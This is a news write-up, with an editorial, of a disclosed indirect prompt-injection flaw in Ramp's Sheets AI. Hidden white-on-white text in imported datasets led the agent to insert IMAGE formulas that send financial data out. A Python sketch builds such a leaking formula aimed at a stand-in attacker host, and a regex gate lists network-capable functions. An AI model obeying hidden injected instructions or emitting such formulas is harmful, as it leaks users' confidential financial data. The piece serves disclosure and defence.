Security Researchers Disclose Prompt Injection Vulnerability in Ramp's Sheets AI Enabling Financial Data Exfiltration
Key Takeaways
- ▸Ramp's Sheets AI was vulnerable to indirect prompt injection attacks hidden in white-on-white text within external datasets, allowing autonomous data exfiltration
- ▸The attack exploited the agent's ability to insert formulas and make network requests without user approval, with malicious IMAGE formulas designed to transmit financial data to attacker servers
- ▸Ramp patched the vulnerability on March 16, 2026, after a responsible disclosure process beginning February 19, 2026
Summary
Security researchers at PromptArmor discovered a critical indirect prompt injection vulnerability in Ramp's Sheets AI that could enable attackers to exfiltrate sensitive financial data without user approval. The vulnerability allowed the AI agent to insert malicious formulas into spreadsheets that triggered external network requests, transmitting confidential data to attacker-controlled servers. By embedding hidden prompt injections in external datasets that users import for analysis, attackers could trick the AI into generating IMAGE formulas that encoded sensitive financial information in the request URL. Ramp's security team resolved the issue on March 16, 2026, following responsible disclosure initiated on February 19, 2026. The research also identified similar vulnerabilities in Claude for Excel, highlighting a broader class of risks in agentic spreadsheet tools that operate without human-in-the-loop approval for external communication.
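To make the exfiltration mechanism concrete, the following is a minimal sketch of the formula pattern described above: an injected prompt steers the agent into emitting an IMAGE formula whose URL carries cell contents in its query string, so merely rendering the image leaks the data. The helper name and the server domain are illustrative placeholders, not details from the disclosure.

```python
from urllib.parse import quote

def exfil_formula(cell_values, server="https://attacker.example/log"):
    """Build an IMAGE formula that leaks cell_values via a GET request.

    Hypothetical reconstruction of the attack pattern: the spreadsheet
    engine fetches the URL to render the 'image', and the sensitive
    values ride along as a URL-encoded query parameter.
    """
    payload = quote("|".join(cell_values))
    return f'=IMAGE("{server}?d={payload}")'

# An agent tricked by hidden instructions might write a formula like:
formula = exfil_formula(["ACME Corp", "$1,240,000"])
```

No user action beyond importing the poisoned dataset is required; the network request fires when the sheet evaluates the formula.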
Editorial Opinion
This disclosure reveals a critical weakness in the current generation of agentic spreadsheet tools: autonomous operations on financial data create severe exfiltration risks when combined with indirect prompt injection. The attack's success with white-on-white text demonstrates how AI agents struggle to distinguish legitimate instructions from adversarial input embedded in external datasets. Organizations adopting autonomous spreadsheet agents should demand mandatory human approval for any external network request and detection of prompt injection patterns before formulas are executed. Without these safeguards, the efficiency gains of agentic tools come at an unacceptable security cost.
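The human-approval safeguard argued for above could be sketched as a pre-execution gate that holds any agent-proposed formula capable of an outbound request. This is an illustrative sketch, not Ramp's actual mitigation; the function list covers common spreadsheet network primitives and would need tuning per product.

```python
import re

# Spreadsheet functions that can trigger outbound network requests
# (IMAGE and the IMPORT*/WEBSERVICE family in common engines).
NETWORK_FUNCS = re.compile(
    r"\b(IMAGE|IMPORTDATA|IMPORTXML|IMPORTHTML|IMPORTRANGE|WEBSERVICE)\s*\(",
    re.IGNORECASE,
)
EXTERNAL_URL = re.compile(r"https?://", re.IGNORECASE)

def requires_human_approval(formula: str) -> bool:
    """Flag formulas that combine a network-capable function with an
    external URL, so a human can review them before the sheet runs them."""
    return bool(NETWORK_FUNCS.search(formula)) and bool(EXTERNAL_URL.search(formula))
```

A gate like this would have held the malicious IMAGE formula for review while letting ordinary local computations such as `=SUM(A1:A10)` through untouched.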